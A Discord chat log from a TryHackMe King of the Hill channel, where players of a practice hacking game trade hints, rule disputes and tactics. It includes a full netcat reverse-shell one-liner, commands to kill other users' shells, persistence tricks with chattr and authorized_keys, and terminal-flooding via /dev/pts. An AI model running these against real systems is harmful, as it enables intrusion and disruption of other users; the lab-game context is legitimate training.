#koth

1 messages Β· Page 64 of 1

vital tide
#

1 sec

#

the http?

fair adder
#

create account and upload an image

vital tide
#

yeaaaa I saw that

#

ima experiment with some rev shells

fair adder
#

go ahead but i wasn't talking about that

#

click on the image you uploaded and take a look to the url

vital tide
#

oh mbmb

fair adder
#

i'm opening burp

#

i never tried this machine actually

vital tide
#

this seems kinda hartd

#

im running some scans and enumeration stuff still

#

wait

#

the url when you upload the image

#

isnt that just your local directories

#

damn

fair adder
#

you canc hange your name

vital tide
#

huh

#

what does that mean

fair adder
#

rce

vital tide
#

oh hmmmmmmmmmm

fair adder
#

go to /profiles

#

if you have an account

#

there you can change your name

#

but use burp

vital tide
#

1 sec

#

wait what

#

I went to the profiles directory

#

its not there-

#

nothings there*

fair adder
#

have you created an account?

vital tide
#

yeaaa

#

im logged in

fair adder
#

hmm

vital tide
#

wackkkk

fair adder
#

hmm thats wird

vital tide
#

are u getting something?

#

I hate windows machines-

#

im still tryna get a shell

fair adder
#

i have rce

vital tide
#

im experimenting with some rev shells rn

#

oh bruh

#

did u upload something?

fair adder
#

no

#

i'm trying

vital tide
#

hmmmmmmm

#

BRUH

#

did u see this

#

rip

fair adder
#

i figured it out

#

;;ss

vital tide
#

BRUH WHA

#

HOWS

#

did u get a shell

fair adder
#

too late now

#

it was stupid

vital tide
#

what was it

fair adder
#

i was getting logged out everytime

vital tide
#

i rlly need to get better at windows machines

#

ima just go do some machines

fair adder
#

i mean this was all web tho

fair adder
vital tide
#

true but for KOTH there are multiple ways right?

vital tide
nova tide
#

@fair adder no spoilers please? πŸ™‚

autumn epoch
#

Sudo apt-get install RTX_3090

fair adder
lilac basin
#

gg Bl4ckC4t

fair adder
#

gg

lilac basin
#

gg

fair adder
#

you have the 8 flag, I have 1

lilac basin
#

can't you find them?

fair adder
#

I'm lost, I don't really like windows machines

lilac basin
#

ahahahah

#

you have to see in every users' folder

fair adder
#

I did that, but there are many folders, it will take a while until I get used to these windows🀣 🀣 🀣

lilac basin
#

it is like this in every machine

lilac basin
fair adder
#

The good thing about koth is that I always learn something new, something very useful, I love these challenges

fair adder
#

same

sour zealot
#

Can someone tell me how to privesc on the H1: easy machine. I know it's very easy but for some reason I just can't figure it out.

#

Ok thx

fair adder
#

And there are writeups available for those rooms...
Another thing I would like to suggest you a room if you haven't done yet:
Common Linux Priv Esc

sour zealot
#

I will thx

frail ridge
#

Does anyone have a hint for H1 hard?

fair adder
#

most specifically what it accepts

stiff egret
#

@fair adder

fair adder
#

Sorry

#

Won't happen again

shadow pivot
#

20 min

sour zealot
lilac basin
#

yep

worldly karma
#

do u have any docs on this? because i really cant understand why it'll work if i inject php code to the body of this GET request

lilac basin
#

inject the payloads in this article in the user agent field

worldly karma
#

yeah but why php executes the HTTP_USER_AGENT

nova tide
#

@worldly karma i would suggest you to stop spoiling the whole box?

worldly karma
#

ok.. we are only talkin about LFI but ok

nova tide
#

i have deleted your messages. Please refrain from posting the whole commands/urls on how to exploit the box.

worldly karma
#

when i pasted the url i changed the names

lilac basin
worldly karma
#

yeh will do

stiff egret
#

Random Public, Starting in 23 mins!

brittle obsidian
#

hey everyone! Would someone like to give me an idea on patching vulnerabilities to maintain the access......I mean I've only been exposed to attacking stuff so far.

#

Are there rooms where I can practice the same?

stiff egret
#

IIRC there is a blue team path on tryhackme.

brittle obsidian
sour vectorBOT
#

Gave +1 Rep to @stiff egret

stiff egret
#

no need of 'sir' :)

brittle obsidian
#

sure:) Moreover, would it make sense to participate with no prior knowledge of defense?

stiff egret
#

Yeah, why not, although it is preferred that you have some idea about how defending works, but you can go on without it as well, and learn along the way.
I'd recommend watching John Hammond's or Optional's videos on King of the hill to get some basic ideas about defending and attacking before you start tho.

brittle obsidian
#

Yeah sure! Great recommendations thoughπŸ’― πŸ™πŸ»

stiff egret
#

For King of the Hill, IIRC alt accounts are also allowed, so you can create another account and make a game with 2 of your accounts. And practice stuff.

( @terse willow Alts are allowed right? )

brittle obsidian
quiet schooner
#

I don't think they are allowed if you're using 'em to control resets

stiff egret
#

yeah, that was an issue with them

quiet schooner
#

There's also KoTH Food and Hackers available as standalones on THM for practice

brittle obsidian
stiff egret
brittle obsidian
#

btw from which level one is considered as intermediate?

stiff egret
#

Is it not letting you play because only intermediate players are allowed?

brittle obsidian
stiff egret
#

Go to Profile> About you > Bottom of the page

worldly karma
quiet schooner
#

The search is still a little... broken

#

Search FoodCTF perhaps?

worldly karma
#

lol

quiet schooner
#

Failing that, search NinjaJc01 and you'll find all my rooms

worldly karma
#

maybe someone can send a direct link?

quiet schooner
#

ree

worldly karma
#

thank you

#

xD

stiff egret
#

time to tag horshark kekw

worldly karma
#

"Problem finding room..
"

quiet schooner
#

Ok now you can thank me. Link was wrong

worldly karma
#

yeah noticed that LOL

stiff egret
quiet schooner
#

There's a link to both of them now

worldly karma
#

oh ok

quiet schooner
#

Gosh, I need to improve those descriptions

candid spade
#

One silly question since i'm new to CTF challenges. So i have the IP what to do with it i can't access it or ping it.. please let me know the step to access i will do further steps on my own.....

worldly karma
#

download the .ovpn file from try hack me

#

and use openvpn

#

in your linux machine

stiff egret
lilac basin
candid spade
#

Ok will check the basic room first..thanks for the info.

stiff egret
candid spade
#

Ok

terse willow
#

I actually can't remember what was decided there

worldly karma
#

so my metasploit session dies instantly when i connect to it through nc and ive seen john hammond do something in one of his videos that immediately opens a meterpreter session which fixed his problem. any ideas what it was?

stiff egret
#

uh... what?

worldly karma
#

lol

#

ok

#

im having a multihandler listener running and im connecting to it from the attacker machine using nc and the session always dies

stiff egret
#

Oh oookkkk, no idea why. πŸ˜… You can always use regular reverse shells. πŸ€·β€β™‚οΈ

worldly karma
#

it happened when i used regular reverse shells too

#

its something that happened to John hammond in one of his videos and he fixed it by doing something in metasploit

#

LOL

stiff egret
#

In THAT case, it usually depends on the reverse shell you used, the most stable IMO is mkfifo one,

#

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

stiff egret
worldly karma
#

ok ill try running that from the target machine

stiff egret
#

ATB

stiff egret
#

NP

worldly karma
#

----r--r-- 1 bob bob 38 Mar 28 2020 log

although im bob, cant read the file. google'd some and i found out the there must be something to do with ACL but i checked it and its fine for bob

quiet schooner
#

Permissions are ugo

#

User, group, other

#

So the owner currently can't read it?

brittle obsidian
#

yeah, you can try that in your own terminal...current permissions are 044....

worldly karma
quiet schooner
#

In group and other, yes

worldly karma
brittle obsidian
worldly karma
#

so why bob cant read

#

if he is part of the group

brittle obsidian
worldly karma
#

wait, maybe i just forgot all of what i learned about linux file permissiobns

worldly karma
#

isnt it owner bob, group bob

#

?

quiet schooner
#

Yes

brittle obsidian
#

he is

worldly karma
#

so bob is indeed part of the group

#

why i cant read 😦

#

cat: log: Permission denied

#

😭

quiet schooner
#

Probably because Owner is more specific so it'd take priority?

worldly karma
#

Owner is bob too

brittle obsidian
fair adder
#

How about if you are Bob change the perms of fileπŸ™„

worldly karma
#

tried

#

Operation not permitted

#

πŸ™„

brittle obsidian
#

it's working fine for me

worldly karma
#

chmod: changing permissions of 'log': Operation not permitted

#

guys maybe someone did this room? Its KothFood

quiet schooner
quiet schooner
worldly karma
#

so in order to read the file i need to be someone who is not bob?

brittle obsidian
quiet schooner
#

I don't remember but probably?
I don't actually remember having a user called bob. They were all food themed.

worldly karma
worldly karma
#

for the question

fair adder
worldly karma
#

gotcha

quiet schooner
#

I'll check my writeups for it

worldly karma
#

ok

#

meanwhile ill try changing a user

fair adder
#

HardStoN so you added your own user named Bob?

worldly karma
quiet schooner
#

That "log" file doesn't appear in my writeup

worldly karma
#

its the flag

#

changed that too

#

xDDDD

quiet schooner
#

Then yeah. You'll probably want to be a different user. Or root.

worldly karma
#

somebody here before was yelling at me that i was spoiling

#

oh ok

remote wasp
brittle obsidian
#

since, I've come across mkfifo command for the first time. All I know is that it makes a named pipe which needs to be connected on 2 sides where one end should be reading and other should be writing and vice-versa. So it means there will be no output after cat /tmp/f since it's not connected on the other side.

#

so my question is then how does using | and the further command playing their role here?

fair adder
brittle obsidian
sour vectorBOT
#

Gave +1 Rep to @solid patrol

elfin coral
#

i am new at koth and i have a question, is it allowed to change the ssh key for users so if anyone find the id_rsa key he could not connect to the machine

elfin coral
#

whats the best way to find flags? just cd cross all directories and search or any commands like grep?

fair adder
#

manually read every file in the system

sour zealot
#

the "*" means its can also be something like flag7.txt

livid anvil
#

@lilac basin good fight!

lilac basin
#

Gg

errant marten
#

6min public

livid anvil
#

thats the first time i got to root on shrek

errant marten
lilac basin
#

please don't reset the machine randomly

#

@fair adder

#

guys what can i do if we are 2 in koth and the other player restart the machine every 5 minutes

white wolf
#

you ask them to stop? :P

lilac basin
#

already do

#

but he continues

fair adder
#

Hello guys, I was playing koth, and when I put my name in /root/king.txt, it returned a permission denied error, how can I leave the file like this? even for root?

lilac basin
#

dont restart the machine

fair adder
#

You were stopping the ssh service .-.

lilac basin
#

nope

#

it is active

#

just enumerate better

fair adder
#

When I got root on the machine, in less than 30s I was expelled from ssh, and I was unable to reconnect

lilac basin
#

enumerate

lilac basin
#

gg

fair adder
#

n0n1m0us

#
  1. Try sending a screenshot, also it looks like your machine not the koth machine?
  2. Mention koth-staff for issues regarding koth not the THM staff.
  3. If you believe someone is breaking the rules, reports go to koth@tryhackme.com
#

Ignore the 1st and 2nd point

#

I just copy pasted this msg from Naughty

lilac basin
#

ty now he stopped from restarting the machine

#

so if he restart it again i will report

fair adder
#

I quit the game because I couldn't play, since the ssh service was unavailable when I tried to connect

livid anvil
#

what do you mean it was unavailable?

#

@fair adder

#

is there something wrong with koth?

#

i cant get to the game. and i cant leave because of that.

fair adder
#

The ssh was being stopped and I was unable to access the machine through the ssh service

livid anvil
#

what was it saying when you tried to connect?

fair adder
#

yes

livid anvil
#

thats not an answer to that question

nova tide
livid anvil
#

^^^^

fair adder
#

I connected to ssh to explore the machine (tyler) and after a while, the connection was closed, and when I tried to reconnect, it returned this "connection refused" error

livid anvil
#

then the port was probably changed

livid anvil
#

i know that. im in but i cant use the find command. its not found for some reason

remote wasp
fair adder
#

helo 🐣

livid anvil
remote wasp
#

🐣

terse willow
#

πŸ‘€

remote wasp
livid anvil
#

welp. gg lol

uneven forge
#

someone really played with this guys emotions changing the ssh port lol

elfin charm
#

a3881fbad643c2a7cb83850c

remote wasp
lilac basin
#

@misty jungle don't give up

#

don't give up doesn't mean RESET THE MACHINE @misty jungle

livid anvil
#

@lilac basin did you harden the hell outta that?

lilac basin
#

maybe

livid anvil
#

i may have found a way but i couldnt get to it before the end. lol.

lilac basin
#

i always leave vulns for the initial access. But the hardest thing is to get root

livid anvil
#

yeah

stiff egret
#

If anyone plays after about half an hour or so, ping me too :)
Gonna make a coffee so strong that'll beat redbull.

lilac basin
#

i'm here

regal notch
#

is the new room up ? jellyfish ?

blissful kettle
#

Not yet

stiff egret
#

Really not the place to ask for it tho.

blissful kettle
regal notch
stiff egret
#

lol NP

sour zealot
stiff egret
#

@lilac basin Hop in if you are still about :)

lilac basin
#

send the link

stiff egret
#

(Let's hope it's not windows pepehands )

sour zealot
#

same

stiff egret
#

ncie

sour zealot
#

I ruined everything for my self. I forgot the password and my shells keep breaking

lilac basin
#

is good to change password?

sour zealot
#

I think as long as its still possible to get root its ok.

lilac basin
#

but if you do you will break the access

stiff egret
# lilac basin is good to change password?

Changing passwords is obv allowed, as it's the part of most basic patching. But a good move would be to leave some other albeit hard ways to get in the machine intact.

#

It's not a fight if there is no one in the ring.

#

Really? A reset? smh, **Please only reset the machine if it is broken!**I can only say this so many times.

livid anvil
#

@stiff egret @lilac basin @sour zealot let me know when you guys make a new game. i might hop on

stiff egret
#

Sure!

worldly karma
#

Do u guys like really talk sometimes in the voice chat here while playing koth?

stiff egret
#

sometimes

#

usually it's just people oohing and aahing when someone kills their shells πŸ˜†

worldly karma
#

Wdym killing their shells?? Like resetting the machine?

stiff egret
#

naah, killing their shells as in killing the PID of shells

fair adder
#

helo 🐣

worldly karma
#

Guys does someone here work as a pentester IRL

worldly karma
stiff egret
#

ps aux | grep pts see the PID of shell someone is on, then kill -9 PID

#

and there will be shouting on the other side of mic

#

πŸ˜†

worldly karma
#

Hahahhahahahah

#

Yoo i gotta hear that

stiff egret
#

watch John Hammond's videos on KoTH, there was a lot of it

worldly karma
#

Lol

#

I do watch him sometimes

stiff egret
#

quality content guaranteed

worldly karma
#

Indeee

fair adder
#

why kill shells if you cna run nyancat on their ttys

stiff egret
stiff egret
worldly karma
#

So my question is, do u guys like rly feel that these ctf's are like the real world

stiff egret
#

although I, too, prefer nyancat over killing shells

worldly karma
#

?

fair adder
#

no

stiff egret
#

I'd say if you ask that question in #general , you'll get way more responses and way more reasons

worldly karma
#

Aight

stiff egret
worldly karma
#

I mean, i wasnt talking about these stuff when i said ctf's, i was talking about like medium-hard rooms

fair adder
#

it depends on what the mac

#

some machines are like

stiff egret
#

reallly depends on the rooms.

fair adder
#

more 'puzzle style' focused

#

there's one machine on htb tho

#

easy one

#

which is pretty realistic

#

but i dont remember the name

fair adder
fair adder
worldly karma
#

An easy machine that is irl?

sour zealot
#

can someone link a write up about H1: easy. I can't figure out the privesc.

stiff egret
#

Sorry, you have to google that around, posting spoilers in this chat is not allowed. :)

sour zealot
#

I know but I can't find any write ups online. So i hoped someone could send me a link.

elfin coral
#

i cant find any writeup also

elfin coral
#

i put my name in king.txt but it doesnt work

livid anvil
#

what do you mean?

#

if you go to <box ip>:9999 you should see your name

elfin coral
#

i am root and i want to edit king.txt but their is a error "Operation not permitted" i am root why i cant change it?

livid anvil
#

how are you exiting vim?

elfin coral
#

strg x and then y

#

if i try it with echo "name" > king.txt its the same error

livid anvil
#

strg x then y?

#

wat

elfin coral
#

ctrl

#
  • x
livid anvil
#

on vim?

elfin coral
#

and then press y for safe but then i get this error

#

on nano

livid anvil
#

thats nano

#

ah

elfin coral
#

its not the editor i get the error with echo > king.txt

livid anvil
#

do you get any other info

elfin coral
#

no only "Operation not permitted"

#

room is over i hope i dont get this error next time too

livid anvil
#

was it set to readonly?

#

i find sometimes i had to use :wq! to write in vim

fair adder
livid anvil
#

^^^^^^^^^^^

#

someone has the file open

fair adder
#

XD

livid anvil
#

so to answer the question. someone who got there first probably had the file locked or opened. to unlock it you may have to boot others off first

fair adder
#

do lsattr king.txt

#

if it has attribute i, that means you can't change/delete the file

#

if it has attribute a

#

that means you can only append to it when writing

#

not overwrite what's already in it

#

generally you will want to do chattr +ai king.txt after putting your name in it and moving the chattr binary to another location with another name

#

so if you lose root others will need to waste some time uploading their own static chattr binary to the machine

#

I'm not sure if chattr is the only binary you're permitted to hide from others / delete

#

I've played with some people who hid ps/kill/pkill/etc, pretty useful aswell (if it's permitted ofc)

elfin coral
#

20min

fair adder
elfin coral
#

who restart the machine all the time

fair adder
#

smol pp people

#

anyway i don't think people often get punished for not following the koth rules

elfin coral
#

i didnt restart it it was the other two

fair adder
#

so yea

#

maybe thats the reason i stopped playing it as much

elfin coral
#

one question when getting root and want to patch the vuln like here the ip with the suid permissions what should i do because changing permission is not allowed

fair adder
#

but if the guy's fun is reseting the machine until he's the first one to perform the steps he has performed a million times before then what can i say kekw

elfin coral
fair adder
#

which means immutable

#

so you remove it from it

elfin coral
#

ah

fair adder
#

and then you can change the permissions

elfin coral
#

okey thank u very much

weary swan
elfin coral
elfin coral
karmic light
bleak briar
#

@karmic light you need to give us the join link not the spectate link

#

If you want us to join

lilac basin
#

@jolly briar don't remove flags

stiff egret
#

Check pins

lilac basin
lilac basin
#

gg @rocky cradleslowyo

fair adder
#

anyone playing rn?

#

I'm up for a game if 5+ people

#

and no emotional resets :)

#

🐣

elfin coral
elfin coral
#

how should i search flags? i only can find 4 flags from 7 at hogwarts machine 😦

stiff egret
#

Just look at every file in general directories.

fair adder
lilac basin
#

someone for king of the hill

lilac basin
#

do you have the machine ip?

#

cuz i can see only expired

#

@fair adder

fair adder
#

Hi

#

Why do u ping me?

#

I don't think I know you

#

@lilac basin

lilac basin
#

You are in a koth with me

#

And I can’t see the machine ip

#

So I want to know if it’s the same for you

stiff egret
#

is it still the case? or you can see the IP now?

lilac basin
#

Nope

#

I join in another koth and it’s giving me expired

#

This is the status

stiff egret
#

Thanks for reporting, pinged higher admins. This is getting looked into. Probably something to do with the overall site upgrades thats been going on recently.

jolly briar
#

i got that error too but refreshing the page solved it

white grail
errant marten
livid anvil
#

@errant marten were you able to see wordpress and the index?

#

nvm

stray oasis
#

i even couldnt load the main page

stray oasis
livid anvil
#

i though it was just me. guess someone was hitting it really hard

lilac basin
fair adder
#

but no one has king yet wtf

lilac basin
#

yep

livid anvil
#

how is no one king yet?

fair adder
#

unless it's bugged for me

livid anvil
#

no one is king

fair adder
fair adder
#

good

#

i win then

#

πŸ™‚

fair adder
livid anvil
#

please be one i can do

#

lol

#

bro

#

wtf...

#

why

#

next!

#

lol

fair adder
#

lol i will play idc

#

at least it's not offline

#

h1: medium is actually kinda cool

livid anvil
#

i just dont know windows yet

fair adder
#

the foothold in this machine is pretty cool

#

got nothing to do with os

fair adder
#

starts in 13 mins

#

am gonna join you blvckmetxl

#

cool :))

#

btw how to broadcast any message?

#

wall "message"

#

Thanks

#

are u 'bhavesh'?

#

Yes

#

It's my first gane and idk how to defend

#

game*

#

most important is persistence

#

adding backdoors, etc

#

after that fix regular stuff

#

suids, change passwords...

#

sudoers, capabilities

#

am gonna try my best but if it's hoth hard or any windows i'll try to get shell first

#

i want h1: hard

#

the best koth machine

#

or space jam πŸ™‚

#

food

#

something wrong with the machine?

#

I guess yes

#

i tried 2 ways but Exit status

#

error

#

did someone patched so quickly?

#

i dont think so

#

i think we should reset

#

it's broken i think

#

root is pretty easy once you're in

#

and no one is root yet

#

oh nvm then

#

What's going on?

livid anvil
#

i forgot we were playing. lol

#

wait. wtf. who broke it

fair adder
#

no one

livid anvil
#

@short loom did you kill the http server?

fair adder
#

it's good

#

i don't think there's a http server in this machine

#

this machine is pretty boring ;s

livid anvil
#

you sure

fair adder
#

it's just a matter of who gets in as ramen and changes password first xd

fair adder
livid anvil
#

well thats stupid

fair adder
#

that's why i said i wanted space jam kekw

livid anvil
#

theres no ssh?

fair adder
#

there is ssh

#

ports are changed

#

idk what he did to http server and 2 more ways to get in

livid anvil
fair adder
#

i got in as food but i can't do anything

fair adder
#

rbash?

#

or he messed the filesystem?

#

no command is found

#

and he changed the port once again

#

what command?

#

if he's messing up the filesystem that is agaisnt the rules

#

-bash: whoami: No such file or directory

#

ok so he messed up the filesystem :))

#

just report then :))

#

I really don't know what he actually did

#

like i found 3/4 ways to get in but none of them worked

fair adder
#

i think i know who he is, he always does this stuff

#

just report

#

probably got banned on his other acc

#

he compresses the system binaries and delete them

#

or smth like that

#

idk honestly

#

good luck playing after this

#

It was a bad/learning experience for me

#

ye

#

that's the reason i kinda stopped playing koth

#

there's people who do this kind of stuff

#

ant there's the people who vote reset for no reason

#

they don't even try, they just vote reset

livid anvil
#

reset so we can get on

fair adder
#

only 10 mins left i guess

livid anvil
#

yeah. and he deleted everything

fair adder
#

Okay i'll do reset

livid anvil
#

yeah this room is stupid

fair adder
#

@lilac basin can i dm>

lilac basin
#

yep

nova tide
fair adder
#

Okok Thanks

slim lake
stiff egret
#

Please keep the language PG13.

#

PG13 mate.

white grail
#

anyone wanna do a KOTH

lilac basin
#

@red sparrow846

#

don't reset the machine cuz you don't know ho to enter

errant marten
#

Hey, how do you add your ssh pub-key to authorized_keys? Like i have tried to do it in koth games but it never work :/

lilac basin
#

ssh-keygen

#

it generates the id_rsa.pub file

errant marten
#

yee ik

lilac basin
#

then "cat id_rsa.pub > authorized_keys"

#

obv you have to copy-paste or wget the id_rsa.pub file in the victim machine

errant marten
#

yee ik, but after all that i still cant ssh in...

lilac basin
#

did you check the ssh config file?

errant marten
#

uh, not really.

#

@lilac basin Nvm I just found a blog that explains how to use it and everything. Thanks for the help anyways πŸ™‚

sour vectorBOT
#

Gave +1 Rep to @lilac basin

lilac basin
#

np

unreal jasper
#

koth anyone?

stray oasis
nova tide
#

If you have an issue regarding KoTH kindly try to ping KoTH staff instead of other staff members as they are the ones supposed to handle that. Koth staff members are:
Naughty
Mr.Holmes
myDonut

Other than that complains go to koth@tryhackme.com

terse willow
#

(Probably better not pinging CMN for it @nova tide)

nova tide
terse willow
#

Yeah -- poor guy has enough on his plate just now πŸ˜†

livid anvil
livid anvil
#

who keeps reseting the machine?

livid anvil
#

i was so close... then i fucked up my shell.....

lilac basin
#

you didn't enumerate well

livid anvil
#

well i think i ran something that locked up www-data by accident. at least going through php

fair adder
#

:

stray oasis
errant marten
#

GGwp @grim narwhal

wary jolt
#

.

fair adder
#

@wary jolt koth?

lilac basin
fair adder
#

@nova tide you won't be Streaming? Koth?

nova tide
#

nah

#

superhero is streaming so i think that would be enough

fair adder
nova tide
#

join in πŸ˜„

#

it will be fun

fair adder
#

I haven't played a koth... don't wanna get stomped by you

livid ginkgo
#

KOTH live now on superhero1's dicsord
[15:20]
superhero1 island
[15:20]
anyone can join the game

lilac basin
#

share the link

fair adder
#

@livid ginkgo @nova tide doubt solving session please

nova tide
#

you weren't able to change the password for root because of me

fair adder
nova tide
#

it makes the file immutable

fair adder
#

But someone showed up with nyancat

ebon kiln
nova tide
ebon kiln
#

in 8 min

livid ginkgo
#

yeah - i didnt patch anything

#

i was looking for flags because once youre on and have chattr thats it its hard to combat

#

it becomes a race condition

#

I also didnt want to play dirty @fair adder by kicking anyone out

#

The only thing I did was echo stuff to terminals

nova tide
#

urandom ^

fair adder
#

Sorry was my first time

livid ginkgo
#

its ok

#

thats why i didnt patch or play dirty - we were there to learn on stream πŸ˜„

fair adder
#

And why was authorized_keys was not writable? Again chattr?

nova tide
#

yup

fair adder
livid ginkgo
#

find . -exec chattr +i {} \;

#

lol

fair adder
#

And I only kicked once ...and it was superhero randomly

livid ginkgo
#

xD

fair adder
#

Btw Thanks Naughty and Watchdog for Koth

#

And you too@north imp

livid ginkgo
#

Thanks @fair adder !

sour vectorBOT
#

Gave +1 Rep to @lapis linden

stray oasis
vast kite
deep crag
deep crag
#

starting in 5 minutes everyone invited

lilac basin
sour zealot
vast kite
errant marten
#

@sour zealot What a clutch!!!!!!!! bro!

#

WP

sour zealot
#

gg

errant marten
#

very fun game

sour zealot
#

yeah it was

errant marten
#

i couldnt find your chattr

#

LOL

sour zealot
#

i had my chattr in /tmp

errant marten
#

bro, i tried to find it with "FIND" command

sour zealot
#

i named it something random so i hoped you wouldn't find it

errant marten
#

ahaha that was smart lol

#

mine was in .../

sour zealot
#

yeah I know. I deleted it a few times but forgot about it later

vast kite
#

@lilac basin cmg for u huh 🀣

lilac basin
#

?

vast kite
#

nothing , gg

lilac basin
#

oh bruh i left the machine

vast kite
lilac basin
vast kite
lilac basin
#

sorry

vast kite
#

@lilac basin thats insane u saved the flags for the last 10min cri

#

gg

lilac basin
#

flags are mine lifeboatvent

sour zealot
vast kite
#

is it okay to remove a user from sudoers file yell_cat @lilac basin

lilac basin
#

yep

#

cuz it can run bin with nopasswd

vast kite
sour zealot
#

I have it 2

#

stop it

vast kite
#

alright , i'm out thats weird paradox i think it's against rules

lilac basin
#

i did stop from giving you nyancat

#

try to get king

#

!!!!

sour zealot
#

I already left srry

#

I almost had it though

#

btw with which command did you make us run the nyancat program?

fair adder
prime knoll
#

CREAT A GAME

narrow warren
lilac basin
#

someone for koth?

deep crag
#

starts in 20 minutes

sour zealot
#

almost everyrthing got patched.

#

I'm on shifu. Trying to find privesc

tribal horizon
lilac basin
#

don't reset the mchine

#

cuz it's not broken

mellow orchid
#

how do u play king of the hill

errant marten
mellow orchid
errant marten
#

You need to change your profile to intermediate to play koth.

#

You can do it even if you are lvl 1

mellow orchid
errant marten
#

I don't think it does have any side effects.

errant marten
mellow orchid
sour vectorBOT
#

Gave +1 Rep to @errant marten

errant marten
mellow orchid
nova tide
sour vectorBOT
#

Gave +1 Rep to @nova tide

sour zealot
fair adder
#

14 mins

#

😳

vast kite
wanton wren
#

XD

#

barely made it

candid geode
#

I like seeing how players attempt to bruteforce my ssh password.

wanton wren
#

oh lol

#

Maybe they don't know you changed it

fair adder
sour vectorBOT
#

Gave +1 Rep to @errant marten

sour zealot
sour zealot
fair adder
#

@sour zealot which user did you get access from

sour zealot
#

rcampbell

fair adder
#

I hope you haven't changed your password πŸ™‚

sour zealot
#

I didn't

sour zealot
#

anyone got some small tips for the H1: medium machine. I can't seem to figure it out.

sour zealot
#

Were the hell is the king.txt in hogwarts?

#

is this normal?

#

nevermind I made the king.txt file myself and it works.

honest quiver
#

lol

candid geode
nova tide
#

Intended, you need to make a king file on your own. just like echoing your name in king.txt will make the file πŸ€·β€β™‚οΈ

glad tangle
#

i've seen people get nyancat'd in koth games, how do you actually do that?

gentle hatch
#

you can use the w command to find the proper device files

glad tangle
#

wait so like
./nyancat > echo "victm pid"?

gentle hatch
#

not the PID, the actual device file, typically just a number like /dev/pts/3

#

and the echo there would break the command

#

test it out locally with a test account, its easy

delicate cedar
#

while true; do clear > /dev/pts/x; sleep 3; done

glad tangle
#

oooh ok, thanks

#

i kinda wanna practice more koth but it's kinda hard lol, so thanks for the tip

frail ridge
#

cant you ban yourself with this?

opal dove
#

well, firewall stuff ig

#

but basically none

frail ridge
#

ok ok ok so its fair nice

white wolf
#

dont kill shells doe

frail ridge
#

but if instead a x i use a *

opal dove
#

it'll do your own

frail ridge
#

im not gonna blow myself?

opal dove
#

people play dirty af

#

I mean, we'd all rather people didn't play like that

#

but it is what it is I guess πŸ€·β€β™‚οΈ

frail ridge
#

jumm ok

opal dove
frail ridge
#

lol ok nice xD

livid anvil
wanton wren
#

:0

#

there are some credentials in the ftp server but idk how to get in 😦

lilac basin
#

try ssh

glad tangle
#

ssh it's almost everytime the best way to get in

stiff egret
# opal dove no rules in koth πŸ€ͺ

There's a quote a lot of rules. Please read in the homepage before you end up breaking some.
That being said, I k you mercury (xD and I k you know the rules)

#

Just everyone please, it's always better to know the limits than to test them and find the hard way

#

Rules on the bottom of the page

lilac basin
vast kite
lilac basin
quasi mason
deep crag
#

starts in 15 minutes

vast kite
#

is it okay to delete all flags and change servcies passwords?! πŸ’€

#

cuz i notice that someone already did this

sour zealot
#

No it's not allowed to change or delete any flags or make them inaccessible. On the other hand it is allowed to change some password but there has to always be a different method to get on the box/root.

quiet schooner
#

IDK why people keep saying there needs to be one vuln left

quiet schooner
#

Yeah.

#

Where does that say you need to leave a vuln in?

#

There's nothing that says you need to leave at least one vuln.

fair adder
lilac basin
stiff egret
#

Time to get that rank back!

stiff egret
#

ATB @lilac basin

lilac basin
#

ahahahahaah

#

let's gooo

#

sorry for the reset

stiff egret
#

uh np

stiff egret
#

Interesting, did you patch the priv-esc?

lilac basin
#

yep

#

or maybe no

stiff egret
#

Mhm, Nice, I am not able to priv-esc for some reason. Trying different methods now

lilac basin
#

i can see you in 2 container, in which one are you trying to do privesc

stiff egret
#

both πŸ˜„

lilac basin
#

ahahaha ok

#

in one of them im sure you can do privesc

#

dont try "/bin/bash -p"

#

this isnt the right way

stiff egret
#

at this point I have dropped the idea to get root shell, I am just trying to get my code on the machine.

lilac basin
#

what code

stiff egret
#

lets see

#

ah damnit no

#

lol

lilac basin
#

5 minutes left

#

u can do it

stiff egret
#

naah man, I found a way, but it'll take time. on the better side, this is a reallllllllly interesting way for this machine

lilac basin
#

yep

#

is this in the admin container?

stiff egret
#

yeah

lilac basin
#

different from the hint i gave before

stiff egret
#

yeah, it's very very diff

lilac basin
#

oh

stiff egret
#

ah, over. it was fun af

#

Congrats on the win @lilac basin

lilac basin
#

ty

#

did you choose the machine?

stiff egret
#

No, it was a public match :)

lilac basin
#

i was asking cuz before the game started someone joined and then left and slso the machine was the hardest one

stiff egret
#

Oh, I wasn't on system when the game started. I was bummed with this machine too, but from what I just learned in last 30 minutes, I damn love this machine.

lilac basin
#

yeah me too

#

now get ready that i'm on my way

stiff egret
#

Can't play for a while, will join back in about 30 minutes/1 hour. Gotta rest a bit :) GG

lilac basin
#

okok

quiet schooner
lilac basin
#

nope

stiff egret
#

7 minutes to go

#

Public match.

fair adder
#

how to use a reverse shell in space jam

terse mortar
#

ggs

fair adder
#

i quit, because i tried fuc.... 4 diferent reverse shells

terse mortar
#

same, i'm guessing someone patched up the perms

frail ridge
#

you can change the perm of the flag

#

thats not fair play

stiff egret
#

You cannot change perms on the flag.

stiff egret
fair adder
#

sup

#

let's play

fair adder
#

no

fair adder
terse mortar
#

2 in if anyone's interested

tribal lotus
#

hi everyone. Can i play 2 player king of the hill mode? How i start game?

errant marten
tribal lotus
errant marten
#

If you want to 1v1 someone create a private game.

#

and send them the link to join.

terse mortar
#

I found 3 flags on production and got king, which is nice

elfin coral
#

i changed the root.txt flag by mistake

#

how can i report the accident?

#

i wanted to change king.txt and changed root.txt hahaha

fair adder
#

That's okay if that's by mistake...just inform those who are playing with you

#

And reset the machine

elfin coral
#

how should i inform them writing dms is not allowed

fair adder
#

wall {text}

#

Or you can just tag them here if you know there discord names

stiff egret
#

Why remove chattr right after one use when you downloaded it ?

#

It will decrease the speed of code.

#

@fair adder

fair adder
#

ye i will change that later, i used to do that for some reason

#

also may i dm you? i have a question

stiff egret
#

Sure, though I am on phone, my replies are limited.

fair adder
#

np it's a yes/no answer type of question

stiff egret
#

Sure

lilac basin
#

@weak zenithhire

#

dont reset the machine randomly

tribal lotus
stiff egret
#

If you want others to join, please share the invite link and not the spectator link.

strange escarp
#

Any one up for KOTH gonna create one if so

strange escarp
#

if any one is intrested

narrow warren
#

Is there a chattr for windows? or

stiff egret
#

You should literally Google that line.

tribal lotus
fair adder
ebon kiln
narrow warren
#

It is just, how to use it and stuff

#

I googled it multiple times

north stag
#

